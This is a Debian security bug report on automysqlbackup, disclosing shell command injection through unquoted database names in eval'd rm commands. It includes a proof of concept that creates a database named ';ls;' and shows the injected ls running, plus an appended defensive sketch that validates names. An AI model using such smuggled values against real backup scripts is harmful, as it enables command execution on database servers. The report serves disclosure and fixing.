Package: automysqlbackup
Version: 2.5-6
Severity: grave
Tags: security patch
This is related to http://bugs.debian.org/706095 as autopostgresqlbackup is a fork of automysqlbackup.

In automysqlbackup, database names are used unmangled and unquoted inside several evals:

# dgrep eval automysqlbackup
/usr/sbin/automysqlbackup:# used "eval" for "rm" commands to try and resolve rotation issues.
/usr/sbin/automysqlbackup:eval rm -f "$BACKUPDIR/latest/*"
/usr/sbin/automysqlbackup:    eval $PREBACKUP
/usr/sbin/automysqlbackup:    eval rm -fv "$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*"
/usr/sbin/automysqlbackup:    eval rm -fv "$BACKUPDIR/daily/$DB/*.$DOW.sql.*"
/usr/sbin/automysqlbackup:    eval rm -fv "$BACKUPDIR/weekly/week.$REMW.*"
/usr/sbin/automysqlbackup:    eval rm -fv "$BACKUPDIR/daily/*.$DOW.sql.*"
/usr/sbin/automysqlbackup:    eval $POSTBACKUP
/usr/sbin/automysqlbackup:eval rm -f "$LOGFILE"
/usr/sbin/automysqlbackup:eval rm -f "$LOGERR"

# Proof of concept exploit by using code copied and pasted from the script on the command line. Depending on the configuration, users may be able to create databases without root access:

# mysqladmin create ';ls;'
# DBNAMES="`mysql --defaults-file=/etc/mysql/debian.cnf --batch --skip-column-names -e "show databases"| sed 's/ /%/g'`"
# echo $DBNAMES
information_schema ;ls; bangstat mysql performance_schema phpmyadmin test
# for DB in $DBNAMES; do eval echo rm -fv "$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*"; done
rm -fv /weekly/information_schema/information_schema_week..*
rm -fv /weekly/
acpid           automysqlbackup       console-setup  devpts        grub     hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: /: Is a directory
acpid           automysqlbackup       console-setup  devpts        grub     hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: _week..*: command not found
rm -fv /weekly/bangstat/bangstat_week..*
rm -fv /weekly/mysql/mysql_week..*
rm -fv /weekly/performance_schema/performance_schema_week..*
rm -fv /weekly/phpmyadmin/phpmyadmin_week..*
rm -fv /weekly/test/test_week..*

# The patch is the same as in http://bugs.debian.org/706095 except for maybe line numbers and possibly some context lines, but there's no (relevant) difference in the relevant lines:

# diff -Bb <(fgrep eval /usr/sbin/autopostgresqlbackup) <(fgrep eval /usr/sbin/automysqlbackup)
0a1
> # used "eval" for "rm" commands to try and resolve rotation issues.

Regards, Axel
-- 
,''`.  | Axel Beckert <a...@debian.org>, http://people.debian.org/~abe/
: :' : | Debian Developer, ftp.ch.debian.org Admin
`. `'  | 1024D: F067 EA27 26B9 C3FC 1486 202E C09E 1D89 9593 0EDE
  `-   | 4096R: 2517 B724 C5F6 CA99 5329 6E61 2FF9 CD59 6126 16B5
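A defensive counterpart to the rotation loop quoted in this report, added here as an illustration and not the patch attached to the bug: database names are validated before they reach the shell, and the weekly cleanup runs without eval. The function names safe_db_name and rotate_weekly are assumptions of this example; the $BACKUPDIR/weekly/$DB/${DB}_week.$REMW.* layout is the script's own.

```shell
# Added example, not automysqlbackup code. Accept only [A-Za-z0-9_]; MySQL
# permits other characters, but those need explicit handling rather than being
# handed to a shell as part of a path or an eval'd command.
safe_db_name() {
    case "$1" in
        ''|*[!A-Za-z0-9_]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Remove the weekly dumps the original "eval rm -fv" line targets, without
# eval. The quoted prefix keeps the name literal; only the trailing * is a
# glob. Returns 1 (and removes nothing) for a name that fails validation.
rotate_weekly() {
    backupdir=$1
    db=$2
    remw=$3
    safe_db_name "$db" || return 1
    set -- "$backupdir/weekly/$db/${db}_week.$remw."*
    [ -e "$1" ] || return 0    # glob matched nothing: $1 is the pattern itself
    rm -fv -- "$@"
}

# Walk a constructed name list that includes the ';ls;' name from the report
# and a name containing the '%' the script's sed substitutes for spaces.
demo() {
    for name in information_schema ';ls;' bangstat 'my%db' test; do
        if safe_db_name "$name"; then
            printf 'ok     %s\n' "$name"
        else
            printf 'REJECT %s\n' "$name"
        fi
    done
}
```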